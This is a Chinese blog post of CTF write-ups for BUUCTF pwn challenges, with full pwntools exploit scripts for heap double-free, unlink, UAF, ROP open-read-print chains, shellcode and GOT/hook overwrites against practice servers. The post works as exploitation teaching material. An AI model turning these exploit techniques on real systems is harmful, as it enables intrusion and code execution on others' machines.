BUUCTF-pwn(13)

wustctf2020_number_game

在这里插入图片描述
此时运用我们的计算机底层的知识,可知,计算机底层储存形式为补码!
-2147483648的补码形式为0x80000000,它取反加一之后仍然是0x80000000,因此这边输入-2147483648
在这里插入图片描述


护网杯_2018_gettingstart

在这里插入图片描述
此时又要用到我们的数学知识!
转换浮点数工具

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './2018_gettingStart'
# Remote instance named in the writeup; this script has no local process() fallback.
r = remote('node4.buuoj.cn',29971)
elf = ELF(binary)  # loaded for completeness; not referenced below

# 0x18 bytes of padding followed by two little-endian 8-byte values. The second
# constant comes from the float-conversion tool the writeup mentions (presumably an
# IEEE-754 double bit pattern the binary compares against -- TODO confirm in the disassembly).
payload = b'a'*0x18+p64(0x7FFFFFFFFFFFFFFF)+p64(0x3FB999999999999A)
sleep(0.3)  # no prompt is awaited; the pause stands in for synchronisation with the service
r.sendline(payload)
r.interactive()

ciscn_2019_final_2

分析主要函数!
在这里插入图片描述
Allocate申请函数!
在这里插入图片描述
Free释放函数!
在这里插入图片描述
Show打印函数!
在这里插入图片描述
Exit退出函数!
在这里插入图片描述
本题涉及IO,故进行细致分析。大致思路为利用UAF漏洞,打印出libc等的低位地址,进而计算出偏移,重写低位地址,修改fd使其指向stdin+0x70的位置,并将该处设置为666,从而进行输入操作!

Allocate()
Free()
Allocate(2)
Allocate(2)
Allocate(2)
Allocate(2)
Free(2)
Allocate()
Free(2)
heap_low_addr = Show(2)
此时通过连续Free(2)达成tcache的double free,需注意Free之间需要Allocate申请一次,设置bool为1即可释放!
在这里插入图片描述
Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(0x91))
在这里插入图片描述
for i in range(7):
    Free(1)#tcache填充
    Allocate(2)
Free(1)
main_arena_low = Show(1)-96
stdin_low = (main_arena_low-0x10+(libc.symbols['_IO_2_1_stdin_']-libc.symbols['__malloc_hook']))
此时填充tcache[0x90],并泄露出libc上低4位字节,可以计算出_IO_2_1_stdin_与__malloc_hook的偏移量!
在这里插入图片描述
Allocate(1,str(stdin_low+0x70))#对已存在的libc的低地址进行覆写
Allocate()
Free(1)
Allocate(2)
Free(1)
new_heap_addr = Show(1)#泄露出heap上低4位字节
此时重复泄露出heap上的低4位字节,为接下来的修改fd指针作准备!
在这里插入图片描述
Allocate(1,str(new_heap_addr-0x30))
Allocate(1,str(new_heap_addr-0x30))
Allocate(1)
Allocate(1,str(666))
此时重新对tcache的fd指针进行布局!重写_fileno(_fileno 字段即文件描述符)
在这里插入图片描述
由上一系列的流程进而可以得到flag
在这里插入图片描述

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './ciscn_final_2'
# Remote instance from the writeup; the commented process() line is the local alternative.
r = remote('node4.buuoj.cn',25631)
#r = process(binary)
elf = ELF(binary)
# Symbol offsets used below are resolved from this libc copy; the commented path is
# the author's glibc-all-in-one build of the same 2.27 library.
libc = ELF('./libc-2.27.so')
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
def Allocate(choice=1,payload='1\n'):
    """Drive menu option 1 (allocate): pick the type, then send *payload* as the inode number.

    choice selects 1 (int) or 2 (short int) at the TYPE prompt. payload is delivered
    raw (no newline appended), so callers include a terminator when the program reads a line.
    """
    menu_prompt = "which command?\n> "
    type_prompt = "TYPE:\n1: int\n2: short int\n>"
    r.sendlineafter(menu_prompt, '1')
    r.sendlineafter(type_prompt, str(choice))
    # sendafter, not sendlineafter: the payload bytes go out exactly as given.
    r.sendafter("your inode number:", payload)

def Free(choice=1):
    """Drive menu option 2 (free) for the given type selector (1 = int, 2 = short int)."""
    selection = str(choice)
    r.sendlineafter("which command?\n> ", '2')
    r.sendlineafter("TYPE:\n1: int\n2: short int\n>", selection)

def Show(choice=1):
    """Drive menu option 3 (show) and return the printed number masked to its field width.

    The decimal value following "number :" is parsed from the rest of the line and
    masked to 32 bits when choice is 1 (int), to 16 bits otherwise (short int).
    """
    r.sendlineafter("which command?\n> ", '3')
    r.sendlineafter("TYPE:\n1: int\n2: short int\n>", str(choice))
    r.recvuntil("number :")
    digits = r.recvuntil('\n')[:-1]
    width_mask = 0xffffffff if choice == 1 else 0xffff
    return int(digits, 10) & width_mask

def Exit():
    """Drive menu option 4 (exit)."""
    option = '4'
    r.sendlineafter("which command?\n> ", option)
    

# Heap-shaping sequence; the ordering follows the step-by-step walkthrough above
# (each Free/Allocate pair reaches a specific allocator state shown in the screenshots).
Allocate()
Free()
Allocate(2)
Allocate(2)
Allocate(2)
Allocate(2)
Free(2)

Allocate()
Free(2)
heap_low_addr = Show(2)  # Show(2) masks to 16 bits: low half-word of a heap pointer, per the writeup

Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(0x91))
for i in range(7):
    Free(1)#tcache
    Allocate(2)
Free(1)
#gdb.attach(r)
main_arena_low = Show(1)-96  # Show(1) masks to 32 bits; 96 is the main_arena offset the writeup uses
# Translate the partial main_arena value into the matching partial _IO_2_1_stdin_ value
# using the distance between the two symbols in the libc copy loaded above.
stdin_low = (main_arena_low-0x10+(libc.symbols['_IO_2_1_stdin_']-libc.symbols['__malloc_hook']))

Allocate(1,str(stdin_low+0x70))
Allocate()
Free(1)
Allocate(2)
Free(1)
new_heap_addr = Show(1)  # second heap leak (low 32 bits), used for the final layout below

Allocate(1,str(new_heap_addr-0x30))
Allocate(1,str(new_heap_addr-0x30))
Allocate(1)
Allocate(1,str(666))  # the writeup says this value ends up in _fileno
success(hex(new_heap_addr))  # log lines only; no protocol effect
success(hex(main_arena_low))
success(hex(stdin_low))
#gdb.attach(r)
Exit()

r.interactive()

[OGeek2019]bookmanager

函数过程较为复杂,其实较为多,不仔细分析了,使用Unlink手法进行攻击__free_hook,经过多次尝试发现__malloc_hook或__realloc_hook无法获取权限,故对__free_hook进行覆写。
本题难度主要是对函数进行分析.攻击手法难度较低!
在这里插入图片描述
位于Edit函数存在堆溢出漏洞!
在这里插入图片描述

from unittest.main import main
from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './pwn'
#r = process(binary)
# Remote instance from the writeup; the commented process() line is the local alternative.
r = remote('node4.buuoj.cn',27418)
elf = ELF(binary)
# Symbol offsets used below come from this libc copy; the commented path is the
# author's glibc-all-in-one build of the same 2.23 library.
libc = ELF('./libc-2.23.so')
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
def start():
    """Answer the initial "create: " prompt with the fixed name used throughout."""
    name = 'njh'
    r.sendlineafter("create: ", name)

def Allocate(chapterName='ab\n'):
    """Menu option 1: add a chapter named *chapterName* (sent with a trailing newline)."""
    prompts = ("Your choice:", "Chapter name:")
    r.sendlineafter(prompts[0], '1')
    r.sendlineafter(prompts[1], chapterName)

def AllocateSect(chapterName,sectionName):
    """Menu option 2: add a section to a chapter and return the address the program prints.

    The program echoes a hex address prefixed with "0x" before asking for the section
    name; the rest of that line is parsed as hex and returned as an int.
    """
    r.sendlineafter("Your choice:", '2')
    r.sendlineafter("add into:", str(chapterName))
    r.recvuntil("0x")
    hex_digits = r.recvline()[:-1]
    printed_addr = int(hex_digits, 16)
    r.sendlineafter("Section name:", str(sectionName))
    return printed_addr

def AllocateText(sectionName,size=0x18,payload='\n'):
    """Menu option 3: attach text of *size* bytes to section *sectionName*, then send *payload* as the text."""
    steps = [
        ("Your choice:", '3'),
        ("add into:", str(sectionName)),
        ("write:", str(size)),
        ("Text:", payload),
    ]
    for prompt, answer in steps:
        r.sendlineafter(prompt, answer)

def Free(chapterName):
    """Menu option 4: delete the chapter named *chapterName*."""
    name = str(chapterName)
    r.sendlineafter("Your choice:", '4')
    r.sendlineafter("Chapter name:", name)

def FreeSect(sectionName):
    """Menu option 5: delete the section named *sectionName*."""
    name = str(sectionName)
    r.sendlineafter("Your choice:", '5')
    r.sendlineafter("Section name:", name)

def FreeText(sectionName):
    """Menu option 6: delete the text attached to section *sectionName*."""
    name = str(sectionName)
    r.sendlineafter("Your choice:", '6')
    r.sendlineafter("Section name:", name)

def Book():
    """Menu option 7: ask the program to print the whole book (the caller reads the output)."""
    choice = '7'
    r.sendlineafter("Your choice:", choice)

def Edit(choice,new,sectionName=''):
    """Menu option 8: rename a chapter (choice 1), rename a section (choice 2) or replace a section's text (any other choice).

    For the text case *sectionName* selects the section and *new* is the replacement content.
    """
    r.sendlineafter("Your choice:", '8')
    kind_prompt = "(Chapter/Section/Text):"
    if choice == 1:
        r.sendlineafter(kind_prompt, 'Chapter')
        r.sendlineafter("Chapter name:", new)
        return
    if choice == 2:
        r.sendlineafter(kind_prompt, 'Section')
        r.sendlineafter("New Section name:", new)
        return
    r.sendlineafter(kind_prompt, 'Text')
    r.sendlineafter("Section name:", str(sectionName))
    r.sendlineafter("New Text:", new)

sectionaddr = []  # never appended to or read below
start()
Allocate('/bin/sh')
# AllocateSect returns the address the program prints; +0x20 is the slot the writeup targets.
target = AllocateSect('/bin/sh','1')+0x20
AllocateSect('/bin/sh','2')
AllocateSect('/bin/sh','3')

# fd/bk pair relative to target -- the unlink setup the writeup describes.
fd = target-0x18
bk = target-0x10
AllocateText('1',0x88)
AllocateText('2',0x88)
AllocateText('3')
AllocateText('3')
AllocateText('3',0x18,b'/bin/sh\x00')

# Overflow out of section 1's text (Edit has no length check, per the writeup) to lay
# out a fake chunk header, the fd/bk pair, and the size fields of the following chunk.
Edit(3,p64(0)+p64(0x81)+p64(fd)+p64(bk)+12*p64(0)+p64(0x80)+p64(0x90),'1')
FreeText('2')
AllocateText('2',0x70,b'a'*8)
Book()
# Book() output is scanned up to the eight 'a's; the next 6 bytes are zero-padded
# to 8 and unpacked. 344 is the main_arena offset the writeup uses.
r.recvuntil(b'aaaaaaaa')
main_arena = u64(r.recv(6).ljust(8,b'\x00'))-344
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']
realloc = libc_base+libc.symbols['__libc_realloc']  # computed but not used below
one = [0x45206,0x4525a,0xef9f4,0xf0897]  # unused; the writeup says the hook-based route was abandoned

# Two edits through section 1: the first writes the __free_hook address, the second
# writes the system address -- the __free_hook overwrite described in the writeup.
Edit(3,b'a'*0x18+p64(libc_base+libc.symbols['__free_hook']),'1')
Edit(3,p64(libc_base+libc.symbols['system']),'1')
success(hex(target))  # log lines only
success(hex(main_arena))
#gdb.attach(r)
Free('/bin/sh')

r.interactive()

ciscn_2019_final_4

House of Spirit
该ELF存在反调试,故我们利用ida进行patch!
在这里插入图片描述
在这里插入图片描述
经过分析主要函数!发现仅仅存在UAF漏洞,不存在其它漏洞,没有Edit编辑函数。
发现采用覆写__malloc_hook的方法失效,故此时我们采用覆写到栈地址上,覆写rip!


本题脚本较大(臃肿),但分步来分析的话相对比较简单!

start()
Allocate(0x88)#0
Allocate()#1
Free(0)
Show(0)
main_arena = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-88
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']
malloc_hook = libc_base+libc.symbols['__malloc_hook']
realloc = libc_base+libc.symbols['__libc_realloc']
environ_addr = libc_base+libc.symbols['environ']
首先我们通过unsorted bin特性泄露出libc基地址


Allocate(0x88)#2 leak libc
Allocate(0x78)#3
Allocate(0x78)#4
Allocate()#5
Allocate(0x88)#6
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(note_addr-0x70))#7
Allocate(0x78)#8
Allocate(0x78)#9
Allocate(0x78,p32(0xff)*3+p32(0)*21+p64(environ_addr))#10
Show(0)# leak stack
stack_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x210
read_addr = libc_base+libc.symbols[‘read’]
此时我们利用double free漏洞得到bss段上的全局变量的chunk,从而修改全局变量来泄露environ内容得到栈地址!
在这里插入图片描述
此时能够泄露出栈地址!
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(stack_addr))#11
Allocate(0x78)#12
Allocate(0x78)#13
payload = p64(0)+p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(stack_addr+0x50)+p64(pop_rdx_ret+libc_base)+p64(0x1000)+p64(read_addr)+b'\n'
Allocate(0x78,payload)#14
此时再次利用double free能够申请得到栈上地址,并写入ROP,此时我们覆写malloc_hook为add rsp;ret即可抬升rsp,并且执行ROP,此时我们能往里面进行写入0x1000大小内容,完成orw!


Allocate(0x68)#15
Allocate(0x68)#16
Allocate()#17
Free(15)
Free(16)
Free(15)
Allocate(0x68,p64(malloc_hook-0x23))
Allocate(0x68)
Allocate(0x68)
Allocate(0x68,b'a'*0x13+p64(libc_base+add_rsp48))
r.sendlineafter(">> ",'1')
r.sendlineafter("size?",'10')
flag = stack_addr+0xd8
payload = p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0)+p64(libc.symbols['openat']+libc_base)
payload += p64(pop_rdi_ret+libc_base)+p64(3)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0x50)+p64(read_addr)
payload += p64(pop_rdi_ret+libc_base)+p64(flag)+p64(libc.symbols['puts']+libc_base)+b'/flag\x00\x00\x00'
sleep(0.1)
r.send(payload)

此时我们利用该流程,便可以得到flag!
在这里插入图片描述

from pwn import *
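context(os='linux',arch='amd64',log_level='debug')

binary = './ciscn_final_4'
# Remote instance from the writeup; the commented process() line is the local alternative.
r = remote('node4.buuoj.cn',28544)
#r = process(binary)
elf = ELF(binary)
# Only the libc copy next to the script is loaded. The author's glibc-all-in-one
# path used to be loaded first and immediately overwritten by the line below; it is
# kept commented, as the other scripts on this page do, so the script no longer
# depends on a file that only exists on the author's machine.
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
libc = ELF('./libc-2.23.so')
# libc-relative gadget offsets as given in the writeup (the trailing comments record
# the values the author noted; add_rsp48's differs -- presumably an alternate build).
pop_rsi_ret = 0x0202e8#0x0202e8
pop_rdi_ret = 0x021102#0x021102
pop_rdx_ret = 0x001b92#0x001b92
add_rsp48 = 0x00c9f81#0x00c9551
note_addr = 0x06020C0  # address of the program's note table, from the screenshots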
def start():
    """Answer the name prompt with an 8-byte 0x81 value followed by the fixed name.

    The leading p64(0x81) is presumably part of the House of Spirit setup named in
    the writeup -- TODO confirm what the program does with the name buffer.
    """
    greeting = p64(0x81) + b'njh'
    r.sendlineafter("what is your name? ", greeting)

def Allocate(size=0x18,payload='\n'):
    """Menu option 1: request a chunk of *size* bytes and send *payload* as its content.

    The content is delivered with sendafter (no newline appended), so payload must
    carry its own terminator when the program reads a line.
    """
    requested = str(size)
    r.sendlineafter(">> ", '1')
    r.sendlineafter("size?", requested)
    r.sendafter("content?", payload)

def Free(index):
    """Menu option 2: free the note at *index*."""
    which = str(index)
    r.sendlineafter(">> ", '2')
    r.sendlineafter("index ?", which)

def Show(index):
    """Menu option 3: ask the program to print note *index*; nothing is read back here."""
    which = str(index)
    r.sendlineafter(">> ", '3')
    r.sendlineafter("index ?", which)

start()
Allocate(0x88)#0
Allocate()#1
Free(0)
Show(0)
# Show(0) prints the freed chunk; the 6 bytes ending in 0x7f are zero-padded to 8
# and unpacked little-endian. 88 is the main_arena offset the writeup uses.
main_arena = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-88
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']
malloc_hook = libc_base+libc.symbols['__malloc_hook']
realloc = libc_base+libc.symbols['__libc_realloc']  # computed but not used below
environ_addr = libc_base+libc.symbols['environ']

Allocate(0x88)#2 leak libc

Allocate(0x78)#3
Allocate(0x78)#4
Allocate()#5
Allocate(0x88)#6

# Free 3, 4, 3 (the double free the writeup relies on); the allocations that follow
# end with a chunk at note_addr-0x70, i.e. over the program's note table.
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(note_addr-0x70))#7
Allocate(0x78)#8
Allocate(0x78)#9
Allocate(0x78,p32(0xff)*3+p32(0)*21+p64(environ_addr))#10
Show(0)# leak stack
# environ holds a stack pointer; -0x210 is the adjustment the writeup derived.
stack_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x210
read_addr = libc_base+libc.symbols['read']

# Same double-free pattern, this time aimed at stack_addr; the final allocation
# places a chain of pop rdi/rsi/rdx gadgets ending in read() there (see the writeup).
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(stack_addr))#11
Allocate(0x78)#12
Allocate(0x78)#13
payload = p64(0)+p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(stack_addr+0x50)+p64(pop_rdx_ret+libc_base)+p64(0x1000)+p64(read_addr)+b'\n'
Allocate(0x78,payload)#14

# Third round with 0x68-byte chunks aimed at malloc_hook-0x23; with 0x13 filler bytes
# the final p64 presumably lands on __malloc_hook itself -- TODO confirm under gdb.
Allocate(0x68)#15
Allocate(0x68)#16
Allocate()#17
Free(15)
Free(16)
Free(15)
Allocate(0x68,p64(malloc_hook-0x23))
Allocate(0x68)
Allocate(0x68)
Allocate(0x68,b'a'*0x13+p64(libc_base+add_rsp48))

success(hex(note_addr))  # log lines only; no protocol effect
success(hex(main_arena))
success(hex(environ_addr))
success(hex(stack_addr))
#gdb.attach(r,'b *0x0000000000400B2C')
# Trigger one more allocation (menu 1, size 10) so the hook is hit, then send the
# second-stage chain (openat / read / puts on "/flag") that the first chain's read() receives.
r.sendlineafter(">> ",'1')
r.sendlineafter("size?",'10')
flag = stack_addr+0xd8  # presumably where the "/flag" string at the end of payload will sit -- TODO confirm
payload = p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0)+p64(libc.symbols['openat']+libc_base)
payload += p64(pop_rdi_ret+libc_base)+p64(3)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0x50)+p64(read_addr)
payload += p64(pop_rdi_ret+libc_base)+p64(flag)+p64(libc.symbols['puts']+libc_base)+b'/flag\x00\x00\x00'
sleep(0.1)  # no prompt is awaited before the raw send
r.send(payload)


r.interactive()

starctf_2019_babyshell

逻辑比较简单!
在这里插入图片描述
check函数检测shellcode是否匹配data段上的一串数据,如下
在这里插入图片描述
此时我们只要输入的shellcode从其中选择即可!


此时我们选择调整rdi与rdx的值,并且调用syscall进行sys_read,并输入sh执行函数!
或者我们可以利用\x00跳出循环比较,从而执行sh函数!如'\x00J'+'\x00' 或 '\x00B3'
在这里插入图片描述

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './starctf_2019_babyshell'
# Remote instance from the writeup; the commented process() line is the local alternative.
r = remote('node4.buuoj.cn',27400)
#r = process(binary)
elf = ELF(binary)  # not referenced below

#gdb.attach(r,'b *0x004008C6')
r.recvuntil("give me shellcode, plz:")
# First stage: only instructions whose bytes pass the program's check (see the
# writeup) -- a run of pops to set rdx/rdi, then syscall. The writeup says this
# reaches sys_read so a second stage can be delivered -- TODO confirm register state at entry.
payload = asm('pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdi;syscall')
r.send(payload)
sleep(0.1)  # let the first stage reach its read before the second send
# Second stage: 0xc filler bytes followed by pwntools' stock shell payload.
r.send(b'a'*0xc+asm(shellcraft.sh()))

r.interactive()

wustctf2020_easyfast

简单的double
在这里插入图片描述
简单的UAF堆题目!

在这里插入图片描述

from pwn import *
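context(log_level='debug',os='linux',arch='amd64')

binary = './wustctf2020_easyfast'
# Remote instance from the writeup; the commented process() line is the local alternative.
r = remote('node4.buuoj.cn',26675)
#r = process(binary)
elf = ELF(binary)
# The libc object was never referenced by this script and its path only exists on
# the author's machine, so it is kept commented (as the other scripts on this page
# do) instead of failing on a missing file.
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
shell_addr = 0x0602090  # program global taken from the screenshots; the script writes 0 there later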
def Allocate(size=0x18):
    """Menu option 1: request a chunk of *size* bytes (no content is sent here)."""
    requested = str(size)
    r.sendlineafter("choice>\n", '1')
    r.sendlineafter("size>\n", requested)

def Free(index):
    """Menu option 2: free the chunk at *index*."""
    which = str(index)
    r.sendlineafter("choice>\n", '2')
    r.sendlineafter("index>\n", which)

def Edit(index,payload='\n'):
    """Menu option 3: select chunk *index* and send *payload* raw (no newline appended)."""
    which = str(index)
    r.sendlineafter("choice>\n", '3')
    r.sendlineafter("index>\n", which)
    r.send(payload)

def Shell():
    """Menu option 4 (the program's shell entry)."""
    option = '4'
    r.sendlineafter("choice>\n", option)

Allocate(0x48)#0
Allocate(0x48)#1
Free(0)
# Chunk 0 can still be edited after free (the UAF the writeup points out); the
# pointer written here is meant to make a later allocation come back at shell_addr-0x10.
Edit(0,p64(shell_addr-0x10))

Allocate(0x48)#2
Allocate(0x48)#3  presumably the one served from shell_addr-0x10 -- TODO confirm under gdb
Edit(3,p64(0))  # presumably writes 8 zero bytes at shell_addr (0x10 chunk header assumed)
success(hex(shell_addr))  # log line only
#gdb.attach(r)
Shell()

r.interactive()

wustctf2020_name_your_dog

存在局限的任意地址写漏洞,较为简单!
在这里插入图片描述
经过计算可以修改scanf@got为后门函数地址!
在这里插入图片描述

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './wustctf2020_name_your_dog'
# Remote instance from the writeup; the commented process() line is the local alternative.
r = remote('node4.buuoj.cn',27072)
#r = process(binary)
elf = ELF(binary)
# Addresses from the screenshots. Both look 32-bit-sized although context is set to
# amd64 -- NOTE(review): confirm the binary's bitness before trusting p64 below.
shell_addr = 0x080485CB  # backdoor function the writeup names
dogs = 0x0804A060  # base of the name array; not referenced below

def nameWhich(offset,payload):
    """Answer "Name for which?" with *offset* and the name prompt with *payload*."""
    slot = str(offset)
    r.sendlineafter("Name for which?\n>", slot)
    r.sendlineafter("Give your name plz: ", payload)

# Negative index -7: the bounded out-of-range write the writeup describes, reaching
# the scanf GOT entry. p64 sends 8 bytes for a 4-byte-looking address -- TODO confirm
# the four trailing zero bytes are harmless for the next GOT slot.
nameWhich('-7',p64(shell_addr))

r.interactive()

ciscn_2019_en_3

该文件出现了FORTIFY保护!
在这里插入图片描述
本题较为简单,2.27的double free,本意想要采用House of Spirit!但是经过实践该方法复杂且无法绕过canary。故还是老老实实采用double free这一最简单的方式来获取权限!
在这里插入图片描述

from pwn import *
context(os='linux',arch='amd64',log_level='debug')

binary = './ciscn_2019_en_3'
# Remote instance from the writeup; the commented process() line is the local alternative.
r = remote('node4.buuoj.cn',26765)
#r = process(binary)
elf = ELF(binary)
# Symbol offsets used below come from this libc copy; the commented path is the
# author's glibc-all-in-one build of the same 2.27 library.
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
libc = ELF('./libc-2.27.so')
def Allocate(size=0x18,payload='\n'):
    """Menu option 1: request a story of *size* bytes and send *payload* as its content.

    Both prompts end with "story: " -- the size is answered first, then the content is
    delivered with sendafter (no newline appended).
    """
    requested = str(size)
    r.sendlineafter("Input your choice:", '1')
    r.sendlineafter("story: ", requested)
    r.sendafter("story: ", payload)

def Free(index):
    """Menu option 4: free the story at *index*."""
    which = str(index)
    r.sendlineafter("Input your choice:", '4')
    r.sendlineafter("Please input the index:", which)


#gdb.attach(r)
# The name is printed back through a format string; the '%p' run leaks pointers and
# the two values after a literal '.' are parsed below.
r.sendlineafter("What's your name?",'%p%p%p%p.%p,%p%p%p%p%p%p%p.%p,')
r.recvuntil(".0x")
libc_base = int(r.recv(12),16)-libc.symbols['_IO_file_jumps']  # 12 hex digits = 48-bit pointer
r.recvuntil(".0x")
stack_addr = int(r.recv(12),16)-0x138  # 0x138 is the adjustment the writeup uses
free_hook = libc_base+libc.symbols['__free_hook']
system = libc_base+libc.symbols['system']
success("stack_addr -> "+hex(stack_addr))  # log lines only
success("libc_base -> "+hex(libc_base))
# 8-byte ID value; presumably a size-field-looking value kept from the abandoned
# House of Spirit attempt the writeup mentions -- TODO confirm it is still needed.
r.sendafter("Please input your ID.",p64(0x71))

Allocate()#0
Allocate(0x18,b'/bin/sh\x00')#1
# Double free of index 0 (the route the writeup settled on); the allocations that
# follow hand back the freed chunk and then __free_hook, where system is written.
Free(0)
Free(0)
Allocate(0x18,p64(free_hook))
Allocate()#2
Allocate(0x18,p64(system))
success(hex(free_hook))
#gdb.attach(r)
Free(1)  # frees the "/bin/sh" chunk


r.interactive()

posted @ 2022-01-17 20:51  望权栈